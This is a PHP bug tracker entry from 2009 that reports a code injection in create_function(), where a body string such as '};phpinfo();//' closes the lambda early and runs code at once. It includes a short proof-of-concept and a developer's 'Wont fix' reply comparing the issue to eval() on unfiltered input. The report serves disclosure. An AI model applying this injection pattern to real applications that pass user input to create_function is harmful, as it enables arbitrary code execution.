PHP :: Bug #48231 :: create_function() command injection vulnerability

Bug #48231

create_function() command injection vulnerability

Submitted:

2009-05-11 02:53 UTC

Modified:

2009-05-11 09:07 UTC

Votes:	5
Avg. Score:	3.4 ± 1.5
Reproduced:	1 of 2 (50.0%)
Same Version:	1 (100.0%)
Same OS:	0 (0.0%)

From:

root at 80sec dot com

Assigned:

Status:

Wont fix

Package:

Scripting Engine problem

PHP Version:

5.*, 6CVS (2009-05-11)

OS:

Private report:

CVE-ID:

None

View Developer Edit

[2009-05-11 02:53 UTC] root at 80sec dot com

Description:
------------
there is a commond injection in this function,you can EXECUTE your php code directly but not CREATE a lambda-style function.It is very useful when sometimes you can create a function but cann??t call your function.



Reproduce code:
---------------
<?php
$newfunc = create_function('', '};phpinfo();//');
?> 

Expected result:
----------------
phpinfo executes runtime,needn't call newfunc.

Actual result:
--------------
phpinfo executes runtime,needn't call newfunc.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2009-05-11 09:07 UTC] jani@php.net

Yea. Right. And eval() is also very secure when passed unfiltered 
input..

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2025 The PHP Group All rights reserved.	Last updated: Fri Oct 31 10:00:02 2025 UTC